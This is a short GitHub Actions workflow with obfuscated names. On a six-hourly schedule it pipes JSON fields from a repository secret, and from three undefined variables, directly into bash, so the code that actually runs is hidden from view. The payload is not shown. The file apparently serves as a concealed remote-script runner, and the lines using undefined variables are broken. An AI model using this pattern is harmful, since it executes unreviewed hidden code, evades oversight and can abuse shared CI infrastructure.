name: bushishuoy
on:
  workflow_dispatch:
  schedule:
    - cron: '23 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: bushishuoy
        env:
          s77: ${{ secrets.s77 }}
        run: |
          echo $s77 | jq -r .xzzke98 | /bin/bash
          echo $ap9930 | jq -r .wxg0 | /bin/bash
          echo $fwpr8815 | jq -r .sx4 | /bin/bash
          echo $rflce8492 | jq -r .nf8 | /bin/bash

